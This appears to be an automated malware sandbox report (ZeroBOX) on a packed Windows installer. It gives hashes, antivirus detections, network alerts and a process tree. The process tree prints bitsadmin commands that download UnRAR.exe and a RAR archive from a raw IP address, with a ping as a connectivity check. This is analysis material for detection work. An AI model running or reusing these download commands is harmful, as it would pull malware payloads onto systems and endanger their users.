Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Nov. 29, 2024, 1:28 p.m.	Nov. 29, 2024, 1:31 p.m.

Size	42.1KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5	`56944be08ed3307c498123514956095b`
SHA256	`a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181`
CRC32	`8FE77926`
ssdeep	`768:hef6qfEqLBTxrLkSRoys2uGUmRDcMznWHWmZCXrs0D3S9i1GcucbMgAoG:efHLrLkSRoybCQUZsrs0DC1cucbMDoG`
Yara	Malicious_Library_Zero - Malicious_Library NSIS_Installer - Null Soft Installer IsPE32 - (no description) PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file

tvtC9D3.exe "C:\Users\test22\AppData\Local\Temp\tvtC9D3.exe"
2004
- PING.EXE ping -n 1 8.8.8.8
  2068
- bitsadmin.exe bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\test22\AppData\Local\Temp\UnRAR.exe"
  2148
- bitsadmin.exe bitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\test22\AppData\Local\Temp\letgrtsC1.rar"
  2648

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
194.15.46.189	Active	Moloch
54.37.204.238	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 194.15.46.189:80 -> 192.168.56.103:49165	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 194.15.46.189:80 -> 192.168.56.103:49165	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2022858	ET HUNTING Suspicious BITS EXE DL From Dotted Quad	Misc activity
TCP 194.15.46.189:80 -> 192.168.56.103:49165	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 194.15.46.189:80	2027266	ET INFO Dotted Quad Host RAR Request	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 29, 2024, 1:28 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.ndata

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	Connection to IP address	suspicious_request	HEAD http://194.15.46.189/UnRAR.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://194.15.46.189/UnRAR.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://194.15.46.189/letgrtsC1.rar
suspicious_features	Connection to IP address	suspicious_request	GET http://194.15.46.189/letgrtsC1.rar

Performs some HTTP requests (4 events)

request	HEAD http://194.15.46.189/UnRAR.exe
request	GET http://194.15.46.189/UnRAR.exe
request	HEAD http://194.15.46.189/letgrtsC1.rar
request	GET http://194.15.46.189/letgrtsC1.rar

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\nsoC187.tmp\nsExec.dll

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\nsoC187.tmp\nsExec.dll

File has been identified by 9 AntiVirus engines on VirusTotal as malicious (9 events)

Bkav	W32.AIDetectMalware
Cylance	Unsafe
CrowdStrike	win/malicious_confidence_60% (D)
APEX	Malicious
McAfeeD	ti!A34D38DFB286
Trapmine	malicious.moderate.ml.score
Kingsoft	malware.kb.a.731
Microsoft	PUA:Win32/Caypnamer.A!ml
DeepInstinct	MALICIOUS

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

ping -n 1 8.8.8.8

Communicates with host for which no DNS query was performed (2 events)

host	194.15.46.189
host	54.37.204.238

Uses suspicious command line tools or Windows utilities (2 events)

cmdline	bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\test22\AppData\Local\Temp\UnRAR.exe"
cmdline	bitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\test22\AppData\Local\Temp\letgrtsC1.rar"

Generates some ICMP traffic

tvtC9D3.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All